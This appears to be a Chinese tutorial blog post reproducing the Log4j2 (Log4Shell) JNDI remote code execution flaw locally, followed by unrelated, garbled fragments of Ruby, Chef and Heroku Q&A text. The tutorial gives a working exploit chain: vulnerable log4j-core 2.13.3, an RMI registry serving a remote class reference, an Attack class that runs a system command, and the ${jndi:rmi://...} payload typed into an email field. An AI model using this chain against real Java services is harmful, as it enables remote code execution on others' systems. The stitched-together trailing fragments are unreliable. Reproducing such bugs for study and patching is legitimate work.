文章目录
注:本文仅供参考学习,不构成任何犯罪引导
相信就在最近两天,不少IT圈的都在因为Log4j2,忙前忙后排查项目吧?
写JAVA的都知道,Log4j是用来记录日志的,它的覆盖率之广以至于此次受影响的范围可以说是核弹级别的影响了。
这个漏洞其实是取决于Log4j的一种Lookup机制,就是当我们做日志输出,出现占位符的时候,通过一些特殊的命令符号,可以执行一些程序代码。
接下来我们就来复现所谓的Log4j2是如何执行攻击的,这里博主用本地的项目来给大家复现一下。
由于博主的本地项目springBoot版本会自动引入spring-boot-starter-logging依赖,首先我们要对其去除,如下:
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<exclusions>
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-logging</artifactId>
</exclusion>
</exclusions>
</dependency>
其次是引入我们的Log4j依赖包,注:受影响的范围为Apache Log4j 2.x <= 2.14.1
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.13.3</version>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.13.3</version>
</dependency>
其次,配置我们的Log4j.xml,就是一个最简单的输出配置,代码如下:
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN">
<Appenders>
<Console name="Console" target="SYSTEM_OUT">
<ThresholdFilter level="info" onMatch="ACCEPT" onMismatch="ACCEPT"/>
<PatternLayout pattern="%d{yyyy-MM-dd HH:mm:ss.sss} %-5level %L %M - %msg%xEx%n"/>
</Console>
</Appenders>
<Loggers>
<logger name="com.example" lecel="info"/>
<root level="info">
<AppenderRef ref="Console"/>
</root>
</Loggers>
</Configuration>
至此漏洞的执行环境就已经配置完毕了。
博主在本地新建一个项目,并编写如下代码,编写完毕以后执行即可。
public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
Registry registry = LocateRegistry.createRegistry(1099);
Reference reference = new Reference("Attack","Attack","http://127.0.0.1:80/");
ReferenceWrapper wrapper = new ReferenceWrapper(reference);
registry.bind("obj",wrapper);
System.out.println("server is running");
}
如上代码块中Attack就是我们要执行的攻击代码。
启动完成以后就可以一直挂载我们待会使用。
攻击代码Attack是一个被编译好了的Java文件,也就是一个Class文件。
我们将编译好的攻击class文件放在nginx目录下,纯编译文件,不带你IDEA的路径。如下图:
攻击代码如下,不做真正的攻击,就简单打开一个记事本。代码如下:
public class Attack implements ObjectFactory{
public Attack(){}
public Object getObjectInstance(Object obj, Name name, Context context, Hashtable hashtable) throws Exception{
System.out.println("I am coming...");
// 打开本地记事本
// 实际攻击行为就不用我多说了,大家可以自行脑补
Process process = Runtime.getRuntime().exec("notepad.exe");
return null;
}
}
将此代码编译完成以后的class文件放进目录即可。
我们将本地项目的代码修改为由log4j打印日志输出,这里博主选用的是《杂货铺项目》中注册界面的邮箱验证时,使用log4j去输出日志。具体代码如下:
如上代码,我们为何要设置System.setProperty(“com.sun.jndi.rmi.object.trustURLCodebase”, “true”); ?
这是因为JDK 5 U45,JDK 6 U45,JDK 7u21,JDK 8u121开始java.rmi.server.useCodebaseOnly默认配置已经改为true,不用自行设置。
但是JDK 6u132, JDK 7u122, JDK 8u113开始com.sun.jndi.rmi.object.trustURLCodebase默认值已改为了false。
这里博主用的JDK版本较高,所以必须手动设置一下,如果你的JDK版本较低的话可以忽略。
至于具体原因以及它的作用感兴趣的可以自行了解一下。
在邮箱输入框中,我们输入如下参数,${jndi:rmi://127.0.0.1:1099/obj} ,然后点击发送验证码。
执行结果展示为:
我们再来看看在项目中的日志,你会惊讶地发现,攻击程序已经在你的项目中执行了!
如上原理,攻击者在攻击代码中可以编写任意攻击代码,在对应环境下的任何线上JAVA且使用了Log4j2的项目中执行,你说,恐怖不恐怖?
从给定URL下载文件并立即将其上传到AmazonS3的更直接的方法是什么(+将有关文件的一些信息保存到数据库中,例如名称、大小等)?现在,我既不使用Paperclip,也不使用Carrierwave。谢谢 最佳答案 简单明了:require'open-uri'require's3'amazon=S3::Service.new(access_key_id:'KEY',secret_access_key:'KEY')bucket=amazon.buckets.find('image_storage')url='http://www.ex
在Ruby(尤其是Rails)中,您经常需要检查某物是否存在,然后对其执行操作,例如:if@objects.any?puts"Wehavetheseobjects:"@objects.each{|o|puts"hello:#{o}"end这是最短的,一切都很好,但是如果你有@objects.some_association.something.hit_database.process而不是@objects呢?我将不得不在if表达式中重复两次,如果我不知道实现细节并且方法调用很昂贵怎么办?显而易见的选择是创建一个变量,然后测试它,然后处理它,但是你必须想出一个变量名(呃),它也会在内存中
我有以下代码,它下载一个文件,然后将文件的内容读入一个变量。使用该变量,它执行一个命令。这个配方不会收敛,因为/root/foo在编译阶段不存在。我可以通过多个聚合和一个来解决这个问题ifFile.exist但我想用一个收敛来完成它。关于如何做到这一点有什么想法吗?execute'download_joiner'docommand"awss3cps3://bucket/foo/root/foo"not_if{::File.exist?('/root/foo')}endpassword=::File.read('/root/foo').chompexecute'join_domain'd
我想在heroku.com上查看我的应用程序日志的内容,所以我关注了thisexcellentadvice并拥有我所有的日志内容。但是我现在很想知道我的日志文件实际在哪里,因为“log/production.log”似乎是空的:C:\>herokuconsoleRubyconsoleforajpbrevx.heroku.com>>files=Dir.glob("*")=>["public","tmp","spec","Rakefile","doc","config.ru","app","config","lib","README","Gemfile.lock","vendor","sc
在Ruby中,这两个表达式看起来做的事情相似:'it'=~/^it$/#0'it'=~/\Ait\Z/#0#but/^it$/==/\Ait\Z/#false所以我想知道^-\A和$-\Z和如何选择使用哪一个? 最佳答案 仅当您匹配的字符串可以包含新行时,差异才重要。\A匹配字符串的开头。^匹配字符串的开头或紧跟在新行之后。同样\Z只匹配字符串的结尾,而$匹配字符串的结尾或者一行的结尾。例如正则表达式/^world$/匹配“hello\nworld”的第二行,但表达式/\Aworld\Z/匹配失败。
在我的schedule.rb文件中,我有以下几行:set:output,'/log/cron_log.log'every5.minutesdocommand'echo"hello"'end我按照这个问题Rails,usingwhenevergemindevelopment中的建议运行了whenever-w,并且我假设cronfile已编写并正在运行。(我也尝试重新启动Rails服务器。)当我运行$crontab-l时,我看到以下内容:0,5,10,15,20,25,30,35,40,45,50,55****/bin/bash-l-c'echo"hello">>/log/cron_log
重新定义Float#/似乎没有效果:classFloatdef/(other)"magic!"endendputs10.0/2.0#=>5.0但是当另一个中缀运算符Float#*被重新定义时,Float#/突然采用了新的定义:classFloatdef/(other)"magic!"enddef*(other)"spooky"endendputs10.0/2.0#=>"magic!"我很想知道是否有人可以解释这种行为的来源,以及其他人是否得到相同的结果。ruby:ruby2.0.0p353(2013-11-22)[x64-mingw32]要快速确认错误,请运行thisscript.
我的正则表达式捕获引用的短语:"([^"]*)"我想通过忽略引号来改进它,引号后跟',-'(按此特定顺序排列的逗号、空格和破折号)。我该怎么做?测试:http://rubular.com/r/xls6vN1w92 最佳答案 这应该可以做到,使用NegativeLookahead:"(?!,-)([^"]*)"(?!,-)有点恶心,但它有效。您要确保引号后面没有跟您的字符串,否则匹配将从结束引号开始。http://rubular.com/r/yFMyUKJOHL 关于ruby正则表达式:"
gemspec语义版本控制运算符~>(又名twiddle-wakka,又名pessimistic运算符)允许限制gem版本但允许进行一些升级。我经常看到它可以读作:"~>3.1"=>"Anyversion3.x,butatleast3.1""~>3.1.1"=>"Anyversion3.1.x,butatleast3.1.1"但是有了一个数字,这条规则就失效了:"~>3"=>"Anyversionx,butatleast3"*NOTTRUE!*"~>3"=>"Anyversion3.x"*True.Butwhy?*如果我想要“任何版本3.x”,我可以只使用“~>3.0”,这是一致的。就
在Textmate中使用ctrl+shift+d快捷方式重复行时,出现以下错误:“ruby:警告:指定了-K;这是为了1.8兼容性,可能会导致奇怪的行为” 最佳答案 此问题不仅限于重复行,还可能出现在其他使用ruby的地方。我通过将Preferences...>Advanced>ShellVariables中的PATH更改为/System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/bin来解决它:/usr/bin:/bin:/usr/sbin:/sbin此更改后,Tex